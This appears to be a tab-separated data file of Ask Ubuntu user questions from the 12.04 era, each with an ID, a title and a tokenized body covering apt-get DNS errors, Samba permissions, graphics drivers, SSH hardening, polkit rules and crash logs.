183987	apt-get issue after upgrading to 12.04	i have recently upgraded my cluster from 11.10 to 12.04 . after the upgrade , i am having trouble running apt-get on the cluster nodes . i can ssh between the nodes ( client-to-client ; client-to-head ; client-to-external etc. ) . however , sudo apt-get update produces the following errors : ign http : //us.archive.ubuntu.com precise inrelease ign http : //security.ubuntu.com precise-security inrelease ign http : //www.openfoam.org maverick inrelease ign http : //us.archive.ubuntu.com precise-updates inrelease err http : //security.ubuntu.com precise-security release.gpg something wicked happened resolving 'security.ubuntu.com : http ' ( -5 - no address associated with hostname ) err http : //www.openfoam.org maverick release.gpg something wicked happened resolving 'www.openfoam.org : http ' ( -5 - no address associated with hostname ) ign http : //us.archive.ubuntu.com precise-backports inrelease ign http : //www.openfoam.org maverick release ign http : //security.ubuntu.com precise-security release err http : //us.archive.ubuntu.com precise release.gpg something wicked happened resolving 'us.archive.ubuntu.com : http ' ( -5 - no address associated with hostname ) ign http : //security.ubuntu.com precise-security/main sources/diffindex err http : //us.archive.ubuntu.com precise-updates release.gpg something wicked happened resolving 'us.archive.ubuntu.com : http ' ( -5 - no address associated with hostname ) ign http : //security.ubuntu.com precise-security/restricted sources/diffindex 15 % [ connecting to us.archive.ubuntu.com ] [ connecting to security.ubuntu.com ] [ connecting to www.openfoam.org ] on the headnode , i have in /etc/network/iterfaces : auto eth0 iface eth0 inet static address 192.168.0.1/24 on the client nodes , i have /etc/network/iterfaces : auto eth0 iface eth0 inet static address 192.168.0.101 netmask 255.255.255.0 gateway 192.168.0.1 please advise . on a `` working '' client node , i get : mpiuser @ crayn4-5150jo : ~ $ nslookup security.ubuntu.com server : 127.0.0.1 address : 127.0.0.1 # 53 non-authoritative answer : name : security.ubuntu.com address : 91.189.92.184 name : security.ubuntu.com address : 91.189.92.190 ping results mpiuser @ crayn4-5150jo : ~ $ ping -c 3 security.ubuntu.com ping security.ubuntu.com ( 91.189.92.190 ) 56 ( 84 ) bytes of data . 64 bytes from 91.189.92.190 : icmp_req=1 ttl=49 time=94.6 ms 64 bytes from 91.189.92.190 : icmp_req=2 ttl=49 time=105 ms 64 bytes from 91.189.92.190 : icmp_req=3 ttl=49 time=103 ms -- - security.ubuntu.com ping statistics -- - 3 packets transmitted , 3 received , 0 % packet loss , time 15674ms rtt min/avg/max/mdev = 94.643/101.462/105.847/4.887 ms on a non-working client node : mpiuser @ crayn2-5150jo : ~ $ nslookup security.ubuntu.com ; ; got servfail reply from 127.0.0.1 , trying next server ; ; got servfail reply from 127.0.0.1 , trying next server server : : :1 address : : :1 # 53 ** server ca n't find security.ubuntu.com : servfail ping mpiuser @ crayn2-5150jo : ~ $ ping -c 3 security.ubuntu.com ping : unknown host security.ubuntu.com
183988	how do you find a file 's location ?	noob here . ok , i open the dash . type `` file '' . an app appears , called `` files '' , icon looks like ta 2-drawer file cabinet . i click that , the app opens i click the `` search button '' . i type the file name in the box and hit enter . the program thinks for a while , then displays a result . great ! the program found the file i was looking for ! it knows where myfile.foo is , but i do n't ! it does n't say where it is ! ! ! ! how do i find out where it is , please ? i hate to say this , but is there an app that works like windows explorer ( but does n't crash every 2 minutes ) ?
183990	how do i get write access to ubuntu files from windows ?	i 'm running ubuntu 11.10 on my virtual machine as a web server . i 've mounted the w : / drive in win 7 to my /www folder in ubuntu . i can read the files , but i 'm not able to write to the files . in samba , i have created the following user : < www-data > = `` < www-data > '' and given guest ok for the www folder : [ www ] comment = ubuntu www area path = /var/www browsable = yes guest ok = yes read only = no create mask = 0755 ; directory mask = 0775 force user = www-data force group = www-data i 've also run sudo chmod -r 755 www to make ensure correct rw access . what am i missing in order to get write access to my ubuntu files from windows ? nothing is logged when i try to write to files , even though i get access denied .
183997	upgrading only several packages , ou packages from one source	we use deb/apt system to deploy php softwares ( around 200 + libraries with dependencies ) . we have a build server , scripts , and a private repository . it 's ok and run fine but we want to update ours packages very often , and update ubuntu packages only when our adminsys have time to handle them . how can we do ? the only solution i see for now is to iterate on package list and do a apt-get install $ packagename . not very easy or even resilient . another idea ?
184006	extension gmail notifier requires goa , soup , gio typelibs	i tried to install gmail notify on gnome 3 but it was not working . when i click over the icon , it says '' extension requires goa , soup , gio typelibs '' . what does it mean ? how can i fix this and get gmail notify working ? my configuration ubuntu 11.10 , gnome shell 3.2.2.1
184012	how can one change the oxygen look away from gtk aplications when having both ubuntu and kubuntu desktop ?	i have both kubuntu and ubuntu desktop installed on my laptop running 12.10. eventhough i enjoy the looks of kde , when using unity , aplications ( firefox , thunderbird , filezilla , geany , amongst others ) and some dialogs from the system appear using the oxigen look of kde . is there a way to ensure the look of gtk when using unity ? i have tried gnome-tweak-tool but all seems to point to using the ambiance theme . nothing seems to fix this .
184013	ca n't install latest nvidia drivers	i 'm trying to install the latest x-swat nvidia drivers . i follow the process described here . it seems to work ok , i.e . my repository shows the right version ( 304.43 ) , but when i load the nvidia x server settings application it still shows nvidia driver version : 295.49 i tried purging , rebooting , reinstalling . nothing seems to make an effect ( at least on the nvidia x server settings app ) . any suggestion why this is happening or how to wipe the driver and install the latest one ?
184016	how can i split an svn repository ?	in our group we have a repository , we would like to move the repository , but in he meantime also we would like to delete some folders and re-indexing the revision ( delete all the revision numbers which are related to the deleted folder ) is this possible ? if yes how ?
184018	problem installing adobe flash player in firefox	i am using firefox 11.0 in ubuntu 12.04 64 bit os and trying to play youtube video and it asks to install adobe flash player . but when i try to install through the ubuntu software centre but i can not find in the list by typing flash or adobe . i even tried the following command : sudo apt-get install adobe-flashplugin but it says that the package is missing or obsolete sudo apt-get install ubuntu-restricted-extras but still it says that the packages were automatically installed and no longer required .
184019	card reader only works for sd not xd cards	i suspect the answer is `` just does n't work '' , but it seems odd to me . my laptop 's card reader works fine for sd cards but completely ignores xd cards : when you plug in an xd card there is nothing in syslog ; nothing pops up in nautilus . the same xd card + reader works fine in windows . anyone know whether this is just an unsupported thing ? according to broadcom there is a driver for linux 2.4 and 2.6 . laptop is acer aspire 5750. lshw output here : *-generic:0 description : sd host controller product : netxtreme bcm57765 memory card reader vendor : broadcom corporation physical id : 0.1 bus info : pci @ 0000:02:00.1 version : 10 width : 64 bits clock : 33mhz capabilities : pm msi pciexpress bus_master cap_list configuration : driver=sdhci-pci latency=0 resources : irq:17 memory : c0400000-c040ffff *-generic:1 unclaimed description : system peripheral product : broadcom corporation vendor : broadcom corporation physical id : 0.2 bus info : pci @ 0000:02:00.2 version : 10 width : 64 bits clock : 33mhz capabilities : pm msi pciexpress bus_master cap_list configuration : latency=0 resources : memory : c0410000-c041ffff *-generic:2 unclaimed description : system peripheral product : broadcom corporation vendor : broadcom corporation physical id : 0.3 bus info : pci @ 0000:02:00.3 version : 10 width : 64 bits clock : 33mhz capabilities : pm msi pciexpress bus_master cap_list configuration : latency=0 resources : memory : c0420000-c042ffff running precise linux 3.2.0-29-generic # 46-ubuntu smp
184022	effect of using dedicated nvidia card instead of intel hd4000	short version : can someone please advise me of the effect of adding a dedicated nvidia geforce gt 630m card to an ubuntu laptop in terms of power consumption and performance gains/losses when doing general productivity tasks and booting up . also , how good are the closed source , open source , and bumblebee drivers for these newer cards compared to support for the intel hd4000 ? long version/background , if any info here is helpful : i 'm thinking of ordering a laptop from pc specialist ( a uk company who actually sell machines without windows pre-installed ) with the following specifications : genesis iv : 15.6 '' auo matte 95 % gamut led widescreen ( 1920x1080 ) intel® core™i5 dual core mobile processor i5-3210m ( 2.50ghz ) 3mb 4gb samsung 1600mhz sodimm ddr3 memory ( 1 x 4gb ) 120gb intel® 520 series ssd , sata 6 gb/s ( upto 550mb/sr | 520mb/sw ) intel 2 channel high definition audio + mic/headphone jack gigabit lan & wireless intel® n135 802.11n ( 150mbps ) + bluetooth now , as i want this laptop mainly for work and not for games , i would be more than content with the hd4000 integrated chip which comes with the processor . however , for compatibility reasons , i am not able to get the specs i want unless i choose a nvidia geforce gt 630m 1gb graphics card , which i do n't have a great deal of use for . i 'm willing to buy it , however , as it 's still cheaper than any other laptop with the specs i want . however , i know that linux power management is n't fantastic with open-source graphics drivers , and i do n't much about bumblebee . basically , whilst i 'm happy to 'tolerate ' the card being there , i do n't want to experience any negative effects on the rest of my system ( battery , performance etc ) and if there are likely to be any , i might reconsider my purchase . so if anyone can advise me on the effects , i would be very grateful , since i doubt i can just turn the card off . thankyou for any assistance : )
184023	enabling multi-touch features of the apple magic mouse on ubuntu 12.04	i want to write a simple app that uses apple 's magic trackpad , nothing special , just so that it recognizes atleast one gesture . the thing is , ubuntu itself doesnt really recognize this device . i 'm using ubuntu 12.04 and by default the device works with 1 finger , but without tap-click or doubletap , 3 fingers move the window and 3 finger spread makes it fullscreen . i managed to enable 2 finger scrolling with `` xinput set-prop 8 'two-finger scrolling ' 1 1 '' , but thats about it . no other gestures work , ginn doesnt start , giesview detects the device but doesnt respond to any of the gestures , and touchegg doesnt start either . i tried example apps from qt that come with ubuntu but they dont work . so ... what do i do ? i tried using qt but all i get from the app is `` got touch without getting touchbegin for id xx '' what else can i use to get my app to work with multitouch devices ?
184026	revert f3 and f4 behavior in byobu ?	with a fresh 12.04 installation of ubuntu , byobu 's interpretation of the function keys seems to have changed . f3 and f4 will still change the active tab on the current session , but it changes it for all connections . previously , if you have two active connections to the same user ( same session ) with user 1 on shell 0/tab 0 and user 2 on shell 0/tab 0 , when user 2 pressed f3 , they would be changed to tab 1 while user 1 would remain on tab 0 . with the latest version in 12.04 , when user 2 presses f3 , all connected users are moved to shell 1/tab 1 . is there any way to re-enable the old behavior ? i have looked at the /etc/byobu directory and only found backend and socketdir files there . toggling backend between tmux and screen did not seem to render any difference . anyone know what , if any , configuration option exist to control this ?
184028	ssh key plus password	i see there are continuous attempts to login into my computer via ssh using usernames , like joan florin root from 60.169.22.118 , -how can i forbid ssh access and only allow it to users with specific key . -or for now how can i block traffic from that specific ip . -or any other ways of securing more the connection to my home network . i do have vpn , but the problem is , the service goes down every now and then , so ssh is the only sure , or constant service that can tell me when my server is up and running at home .
184035	why does apt-get update get a 403 from private-ppas for purchases in the software-center ?	here 's the apt-get update output on the lines with a 403 error : w : failed to fetch https : //private-ppa.launchpad.net/commercial-ppa-uploaders/bit-trip-beat/ubuntu/dists/precise/main/binary-amd64/packages the requested url returned error : 403 w : failed to fetch https : //private-ppa.launchpad.net/commercial-ppa-uploaders/bit-trip-beat/ubuntu/dists/precise/main/binary-i386/packages the requested url returned error : 403 e : some index files failed to download . they have been ignored , or old ones used instead . here 's what 's in cat /etc/apt/sources.list.d/*.list | grep ppa : deb https : //private-ppa.launchpad.net/commercial-ppa-uploaders/bit-trip-beat/ubuntu precise main # added by software-center ; credentials stored in /etc/apt/auth.conf here 's a redacted version of my auth.conf : machine private-ppa.launchpad.net/commercial-ppa-uploaders/bit-trip-beat/ubuntu login dlamblin password 3 ... ... ... ... ... ... 6 that 's a hash presumably for the purchase processed through my ubuntu one account for the humble bundle for android 3 ( and windows/mac/linux ) .
184042	how do i use xte to bind next/previous to my mouse ?	i know how to use xbindkeys , but i do n't know what is the xte command for previous/next , when i want to bind my extra mouse buttons to navigate nautilus/web browser to go 1 step back or 1 step forward .
184044	how to create bootable usb from pre-installed ubuntu ?	i am a new ubuntu user . whoever helped me assumes that i 've actively downloaded ubuntu and so have an iso . but i got ubuntu pre-installed , and want to create a bootable usb backup . no idea what to point the startup disk creator to . ( this seems to be a good thing to have , maybe as a link for more info , on the how to do it guides . )
184048	is there an easy way to locate various programs that seem to be 'hidden ' ?	i just updated my wife 's 10.04 to 12.04 over the weekend and on occasion i must use her computer . is there an easy way to locate various programs that seem to be 'hidden ' . i was able to at one point locate the 'konsole ' ( terminal program ) but found my method of navigation extremely convoluted . is there a better way to have ready access to less popular programs ? thank you
184050	wireshark not working on 12.04 , how do i get this working ?	i want to want to read the packets of data that are transferred to and from my laptop . i installed wireshark from the software center , but the software is n't able to detect my wireless lan . any ideas , what might i be doing wrong ?
184053	laptop crashed : why ?	my linux ( ubuntu 12.04 ) laptop crashed , and i am trying to figure out why . # last sds pts/4 :0 tue sep 4 10:01 still logged in sds pts/3 :0 tue sep 4 10:00 still logged in reboot system boot 3.2.0-29-generic tue sep 4 09:43 - 11:23 ( 01:40 ) sds pts/8 :0 mon sep 3 14:23 - crash ( 19:19 ) this seems to indicate a crash at 09:42 ( = 14:23+19:19 ) . as per another question , i looked at /var/log : auth.log : sep 4 09:17:02 t520sds cron [ 32744 ] : pam_unix ( cron : session ) : session closed for user root sep 4 09:43:17 t520sds lightdm : pam_unix ( lightdm : session ) : session opened for user lightdm by ( uid=0 ) no messages file syslog : sep 4 09:24:19 t520sds kernel : [ 219104.819975 ] cpu0 : package power limit normal sep 4 09:43:16 t520sds kernel : imklog 5.8.6 , log source = /proc/kmsg started . kern.log : sep 4 09:24:19 t520sds kernel : [ 219104.819969 ] cpu1 : package power limit normal sep 4 09:24:19 t520sds kernel : [ 219104.819971 ] cpu2 : package power limit normal sep 4 09:24:19 t520sds kernel : [ 219104.819974 ] cpu3 : package power limit normal sep 4 09:24:19 t520sds kernel : [ 219104.819975 ] cpu0 : package power limit normal sep 4 09:43:16 t520sds kernel : imklog 5.8.6 , log source = /proc/kmsg started . sep 4 09:43:16 t520sds kernel : [ 0.000000 ] initializing cgroup subsys cpuset sep 4 09:43:16 t520sds kernel : [ 0.000000 ] initializing cgroup subsys cpu i had a computation running until 9:24 , but the system crashed 18 minutes later ! kern.log has many pages of these : sep 4 09:43:16 t520sds kernel : [ 0.000000 ] total ram covered : 8086m sep 4 09:43:16 t520sds kernel : [ 0.000000 ] gran_size : 64k chunk_size : 64k num_reg : 10 lose cover ram : 38m sep 4 09:43:16 t520sds kernel : [ 0.000000 ] gran_size : 64k chunk_size : 128k num_reg : 10 lose cover ram : 38m sep 4 09:43:16 t520sds kernel : [ 0.000000 ] gran_size : 64k chunk_size : 256k num_reg : 10 lose cover ram : 38m sep 4 09:43:16 t520sds kernel : [ 0.000000 ] gran_size : 64k chunk_size : 512k num_reg : 10 lose cover ram : 38m sep 4 09:43:16 t520sds kernel : [ 0.000000 ] gran_size : 64k chunk_size : 1m num_reg : 10 lose cover ram : 38m sep 4 09:43:16 t520sds kernel : [ 0.000000 ] gran_size : 64k chunk_size : 2m num_reg : 10 lose cover ram : 38m sep 4 09:43:16 t520sds kernel : [ 0.000000 ] gran_size : 64k chunk_size : 4m num_reg : 10 lose cover ram : 38m sep 4 09:43:16 t520sds kernel : [ 0.000000 ] gran_size : 64k chunk_size : 8m num_reg : 10 lose cover ram : 38m sep 4 09:43:16 t520sds kernel : [ 0.000000 ] gran_size : 64k chunk_size : 16m num_reg : 10 lose cover ram : 38m sep 4 09:43:16 t520sds kernel : [ 0.000000 ] *bad*gran_size : 64k chunk_size : 32m num_reg : 10 lose cover ram : -16m sep 4 09:43:16 t520sds kernel : [ 0.000000 ] *bad*gran_size : 64k chunk_size : 64m num_reg : 10 lose cover ram : -16m sep 4 09:43:16 t520sds kernel : [ 0.000000 ] gran_size : 64k chunk_size : 128m num_reg : 10 lose cover ram : 0g sep 4 09:43:16 t520sds kernel : [ 0.000000 ] gran_size : 64k chunk_size : 256m num_reg : 10 lose cover ram : 0g sep 4 09:43:16 t520sds kernel : [ 0.000000 ] gran_size : 64k chunk_size : 512m num_reg : 10 lose cover ram : 0g sep 4 09:43:16 t520sds kernel : [ 0.000000 ] gran_size : 64k chunk_size : 1g num_reg : 10 lose cover ram : 0g sep 4 09:43:16 t520sds kernel : [ 0.000000 ] *bad*gran_size : 64k chunk_size : 2g num_reg : 10 lose cover ram : -1g does this mean that my ram is bad ? ! it also says sep 4 09:43:16 t520sds kernel : [ 2.944123 ] ext4-fs ( sda1 ) : info : recovery required on readonly filesystem sep 4 09:43:16 t520sds kernel : [ 2.944126 ] ext4-fs ( sda1 ) : write access will be enabled during recovery sep 4 09:43:16 t520sds kernel : [ 3.088001 ] firewire_core : created device fw0 : guid f0def1ff8fbd7dff , s400 sep 4 09:43:16 t520sds kernel : [ 8.929243 ] ext4-fs ( sda1 ) : orphan cleanup on readonly fs sep 4 09:43:16 t520sds kernel : [ 8.929249 ] ext4-fs ( sda1 ) : ext4_orphan_cleanup : deleting unreferenced inode 658984 ... sep 4 09:43:16 t520sds kernel : [ 9.343266 ] ext4-fs ( sda1 ) : ext4_orphan_cleanup : deleting unreferenced inode 525343 sep 4 09:43:16 t520sds kernel : [ 9.343270 ] ext4-fs ( sda1 ) : 56 orphan inodes deleted sep 4 09:43:16 t520sds kernel : [ 9.343271 ] ext4-fs ( sda1 ) : recovery complete sep 4 09:43:16 t520sds kernel : [ 9.645799 ] ext4-fs ( sda1 ) : mounted filesystem with ordered data mode . opts : ( null ) does this mean my hd is bad ? as per faultyhardware , i tried smartctl -l selftest , which uncovered no errors : smartctl 5.41 2011-06-09 r3365 [ x86_64-linux-3.2.0-30-generic ] ( local build ) copyright ( c ) 2002-11 by bruce allen , http : //smartmontools.sourceforge.net === start of information section === model family : seagate momentus 7200.4 device model : st9500420as serial number : 5vje81yk lu wwn device id : 5 000c50 0440defe3 firmware version : 0003lvm1 user capacity : 500,107,862,016 bytes [ 500 gb ] sector size : 512 bytes logical/physical device is : in smartctl database [ for details use : -p show ] ata version is : 8 ata standard is : ata-8-acs revision 4 local time is : mon sep 10 16:40:04 2012 edt smart support is : available - device has smart capability . smart support is : enabled === start of read smart data section === smart overall-health self-assessment test result : passed see vendor-specific attribute list for marginal attributes . general smart values : offline data collection status : ( 0x82 ) offline data collection activity was completed without error . auto offline data collection : enabled . self-test execution status : ( 0 ) the previous self-test routine completed without error or no self-test has ever been run . total time to complete offline data collection : ( 0 ) seconds . offline data collection capabilities : ( 0x7b ) smart execute offline immediate . auto offline data collection on/off support . suspend offline collection upon new command . offline surface scan supported . self-test supported . conveyance self-test supported . selective self-test supported . smart capabilities : ( 0x0003 ) saves smart data before entering power-saving mode . supports smart auto save timer . error logging capability : ( 0x01 ) error logging supported . general purpose logging supported . short self-test routine recommended polling time : ( 1 ) minutes . extended self-test routine recommended polling time : ( 109 ) minutes . conveyance self-test routine recommended polling time : ( 2 ) minutes . sct capabilities : ( 0x103b ) sct status supported . sct error recovery control supported . sct feature control supported . sct data table supported . smart attributes data structure revision number : 10 vendor specific smart attributes with thresholds : id # attribute_name flag value worst thresh type updated when_failed raw_value 1 raw_read_error_rate 0x000f 117 099 034 pre-fail always - 162843537 3 spin_up_time 0x0003 100 100 000 pre-fail always - 0 4 start_stop_count 0x0032 100 100 020 old_age always - 571 5 reallocated_sector_ct 0x0033 100 100 036 pre-fail always - 0 7 seek_error_rate 0x000f 069 060 030 pre-fail always - 17210154023 9 power_on_hours 0x0032 095 095 000 old_age always - 174362787320258 10 spin_retry_count 0x0013 100 100 097 pre-fail always - 0 12 power_cycle_count 0x0032 100 100 020 old_age always - 571 184 end-to-end_error 0x0032 100 100 099 old_age always - 0 187 reported_uncorrect 0x0032 100 100 000 old_age always - 0 188 command_timeout 0x0032 100 100 000 old_age always - 1 189 high_fly_writes 0x003a 100 100 000 old_age always - 0 190 airflow_temperature_cel 0x0022 061 043 045 old_age always in_the_past 39 ( 0 11 44 26 ) 191 g-sense_error_rate 0x0032 100 100 000 old_age always - 84 192 power-off_retract_count 0x0032 100 100 000 old_age always - 20 193 load_cycle_count 0x0032 099 099 000 old_age always - 2434 194 temperature_celsius 0x0022 039 057 000 old_age always - 39 ( 0 15 0 0 ) 195 hardware_ecc_recovered 0x001a 041 041 000 old_age always - 162843537 196 reallocated_event_count 0x000f 095 095 030 pre-fail always - 4540 ( 61955 , 0 ) 197 current_pending_sector 0x0012 100 100 000 old_age always - 0 198 offline_uncorrectable 0x0010 100 100 000 old_age offline - 0 199 udma_crc_error_count 0x003e 200 200 000 old_age always - 0 254 free_fall_sensor 0x0032 100 100 000 old_age always - 0 smart error log version : 1 no errors logged smart self-test log structure revision number 1 num test_description status remaining lifetime ( hours ) lba_of_first_error # 1 extended offline completed without error 00 % 4545 - smart selective self-test log data structure revision number 1 span min_lba max_lba current_test_status 1 0 0 not_testing 2 0 0 not_testing 3 0 0 not_testing 4 0 0 not_testing 5 0 0 not_testing selective self-test flags ( 0x0 ) : after scanning selected spans , do not read-scan remainder of disk . if selective self-test is pending on power-up , resume after 0 minute delay . googling for the messages proved inconclusive , i ca n't even figure out whether the messages are routine or catastrophic . so , what do i do now ?
184057	where is thunderbird 's tools menu ?	i just successfully upgraded from 10.04 to 12.04 , and these instructions appear to be exactly what i want . however , for the life of me , i can not find thunderbird 's tools menu to import my evolution email . i am using thunderbird installed as part of the 12.04 upgrade , and the thunderbird global menu package is installed . i checked . i can not find how to indicate what version thunderbird is other than it was installed as part of 12.04 . thanks .
184058	no usable polish keyboard layout	i 'm using ubuntu 12.04 with the xfce desktop , all packages up to date . i wanted to set up a keyboard layout for the polish language ( polish uses the roman alphabet , with a few additional characters like ą , ł , ż , etc ) . i went to the keyboard control panel , and under polish i saw several options - all of them useless to me . one was for kashubian . one was the obsolete qwertz layout . several variations of dvorak . and one for russian - i do n't even know what it was doing there . what was missing was the de-facto standard layout , known as `` polski programisty '' ( `` polish programmer 's '' ) . is there a package that has the layout i want ? if not , how do i create my own layout ? and where do i send the patch ?
184070	how do i disable fading animation when changing wallpapers ?	i 'm using 12.04 . when i change wallpapers , i do n't want to wait for the old wallpaper to fade out and the new one fade in . is this possible ?
184071	what is the purpose of the -9 option in the kill command ?	is there a difference between kill -9 212121 and kill 212121
184076	why does n't the scanlogic sl11r-ide usb-to-ata adapter work ?	i am trying to recover data from an old linux that was installed in a computer on an ata hard drive . i found a scanlogic corp. sl11r-ide ide bridge ( 04ce:0002 ) , an ata adapter to usb 1.0 like the one in the picture : and after switching it on , i plugged it into a laptop with ubuntu 12.04 . i am used to the drives being automatically mounted , but this one does n't show up in /media . after doing a dmesg , all i got is this : [ 215298.671924 ] usb 2-1.1 : new full-speed usb device number 5 using ehci_hcd [ 215298.767330 ] scsi19 : usb-storage 2-1.1:1.0 [ 215299.841701 ] usb 2-1.1 : reset full-speed usb device number 5 using ehci_hcd [ 215300.017258 ] usb 2-1.1 : reset full-speed usb device number 5 using ehci_hcd [ 215300.197050 ] usb 2-1.1 : reset full-speed usb device number 5 using ehci_hcd [ 215300.372730 ] usb 2-1.1 : reset full-speed usb device number 5 using ehci_hcd i tried plugging in the adapter to the three different usb ports in my laptop ( one of them usb 3.0 ) , but got no luck with any of them . i get different devices under , for example : /dev/bus/usb/003/002 or /dev/bus/usb/002/004 , but i do n't get any /dev/sdbn links . the output blkid -o list -c /dev/null is just the laptop 's partitions . i have tried taking out the jumper , putting it as master and as cs enabled , but did n't change the result . if i plug it into a windows7 laptop , the device is recognised but nothing is mounted . when i plug it into the windows7 laptop and connect the device to a vmware ubuntu 12.04 session running on windows7 , i get the same results as with the ubuntu laptop -- the dmesg results as above , but it is not mounted . any ideas ?
184084	man pages not finding entry	so , i 'm not sure what is going on with my system ( ubuntu 12.04 ) , but my man pages do not seem to be working . i try man gcc and get the following response no manual entry for gcc see 'man 7 undocumented ' for help when manual pages are not available . however i see the man entry in /usr/share/man/man1/gcc.1.gz here is what my /etc/manpath.config file looks like # manpath.config # # this file is used by the man-db package to configure the man and cat paths . # it is also used to provide a manpath for those without one by examining # their path environment variable . for details see the manpath ( 5 ) man page . # # lines beginning with ` # ' are comments and are ignored . any combination of # tabs or spaces may be used as `whitespace ' separators . # # there are three mappings allowed in this file : # -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- # mandatory_manpath manpath_element # manpath_map path_element manpath_element # mandb_map global_manpath [ relative_catpath ] # -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- - # every automatically generated manpath includes these fields # # mandatory_manpath /usr/src/pvm3/man # mandatory_manpath /usr/man mandatory_manpath /usr/share/man mandatory_manpath /usr/local/share/man # -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- - # set up path to manpath mapping # ie . what man tree holds man pages for what binary directory . # # *path* - > *manpath* # manpath_map /bin /usr/share/man manpath_map /usr/bin /usr/share/man manpath_map /sbin /usr/share/man manpath_map /usr/sbin /usr/share/man manpath_map /usr/local/bin /usr/local/man manpath_map /usr/local/bin /usr/local/share/man manpath_map /usr/local/sbin /usr/local/man manpath_map /usr/local/sbin /usr/local/share/man manpath_map /usr/x11r6/bin /usr/x11r6/man manpath_map /usr/bin/x11 /usr/x11r6/man manpath_map /usr/games /usr/share/man manpath_map /opt/bin /opt/man manpath_map /opt/sbin /opt/man # -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- - # for a manpath element to be treated as a system manpath ( as most of those # above should normally be ) , it must be mentioned below . each line may have # an optional extra string indicating the catpath associated with the # manpath . if no catpath string is used , the catpath will default to the # given manpath . # # you *must* provide all system manpaths , including manpaths for alternate # operating systems , locale specific manpaths , and combinations of both , if # they exist , otherwise the permissions of the user running man/mandb will # be used to manipulate the manual pages . also , mandb will not initialise # the database cache for any manpaths not mentioned below unless explicitly # requested to do so . # # in a per-user configuration file , this directive only controls the # location of catpaths and the creation of database caches ; it has no effect # on privileges . # # any manpaths that are subdirectories of other manpaths must be mentioned # *before* the containing manpath . e.g . /usr/man/preformat must be listed # before /usr/man . # # *manpath* - > *catpath* # mandb_map /usr/man /var/cache/man/fsstnd mandb_map /usr/share/man /var/cache/man mandb_map /usr/local/man /var/cache/man/oldlocal mandb_map /usr/local/share/man /var/cache/man/local mandb_map /usr/x11r6/man /var/cache/man/x11r6 mandb_map /opt/man /var/cache/man/opt # # -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- - # program definitions . these are commented out by default as the value # of the definition is already the default . to change : uncomment a # definition and modify it . # # define pager pager -s # define cat cat # define tr tr '\255\267\264\327 ' '\055\157\047\170' # define grep grep # define troff groff -mandoc # define nroff nroff -mandoc # define eqn eqn # define neqn neqn # define tbl tbl # define col col # define vgrind vgrind # define refer refer # define grap grap # define pic pic -s # # define compressor gzip -c7 # -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- - # misc definitions : same as program definitions above . # # define whatis_grep_flags -i # define apropos_grep_flags -iew # define apropos_regex_grep_flags -ie # -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- - # section names . manual sections will be searched in the order listed here ; # the default is 1 , n , l , 8 , 3 , 0 , 2 , 5 , 4 , 9 , 6 , 7 . multiple section # directives may be given for clarity , and will be concatenated together in # the expected way . # if a particular extension is not in this list ( say , 1mh ) , it will be # displayed with the rest of the section it belongs to . the effect of this # is that you only need to explicitly list extensions if you want to force a # particular order . sections with extensions should usually be adjacent to # their main section ( e.g . `` 1 1mh 8 ... '' ) . # section 1 n l 8 3 2 3posix 3pm 3perl 5 4 9 6 7 # # -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- - # range of terminal widths permitted when displaying cat pages . if the # terminal falls outside this range , cat pages will not be created ( if # missing ) or displayed . # # mincatwidth 80 # maxcatwidth 80 # # if catwidth is set to a non-zero number , cat pages will always be # formatted for a terminal of the given width , regardless of the width of # the terminal actually being used . this should generally be within the # range set by mincatwidth and maxcatwidth . # # catwidth 0 # # -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- - # flags . # nocache keeps man from creating cat pages . # nocache thanks for any help ( p.s . even 'man man ' fails ) edit : when i run ls -l /usr/share/man/man1/gcc* i get the following output lrwxrwxrwx 1 root root 12 may 27 15:41 /usr/share/man/man1/gcc.1.gz - > gcc-4.6.1.gz -rw-r -- r -- 1 root root 217776 apr 15 17:34 /usr/share/man/man1/gcc-4.6.1.gz
184085	polkit : disable all users except those in group wheel ?	is it possible to do the following using 1 polkit .pkla file ? disable all users except those in the wheel group from using polkit . the users in the wheel group will need to provide the root password when using polkit . /etc/polkit-1/localauthority/50-local.d/99-wheel-only.pkla [ disable all users except the wheel group ] identity=unix-group : wheel action=* resultany= ? ? ? resultinactive= ? ? ? resultactive= ? ? ? the following file works but you need to provide all the users in /etc/group : [ disable all users except those in the wheel group : root and myuser ] identity=unix-user : daemon ; unix-user : bin ; unix-user : sys ; unix-user : adm ; unix-user : tty ; unix-user : disk ; unix-user : lp ; unix-user : mail ; unix-user : news ; unix-user : uucp ; unix-user : man ; unix-user : proxy ; unix-user : kmem ; unix-user : dialout ; unix-user : fax ; unix-user : voice ; unix-user : cdrom ; unix-user : floppy ; unix-user : tape ; unix-user : sudo ; unix-user : audio ; unix-user : dip ; unix-user : www-data ; unix-user : backup ; unix-user : operator ; unix-user : list ; unix-user : irc ; unix-user : src ; unix-user : gnats ; unix-user : shadow ; unix-user : utmp ; unix-user : video ; unix-user : sasl ; unix-user : plugdev ; unix-user : staff ; unix-user : games ; unix-user : users ; unix-user : nogroup ; unix-user : libuuid ; unix-user : crontab ; unix-user : messagebus ; unix-user : debian-exim ; unix-user : mlocate ; unix-user : avahi ; unix-user : netdev ; unix-user : bluetooth ; unix-user : lpadmin ; unix-user : ssl-cert ; unix-user : fuse ; unix-user : utempter ; unix-user : debian-gdm ; unix-user : scanner ; unix-user : saned ; unix-user : i2c ; unix-user : haldaemon ; unix-user : powerdev action=* resultany=no resultinactive=no resultactive=no
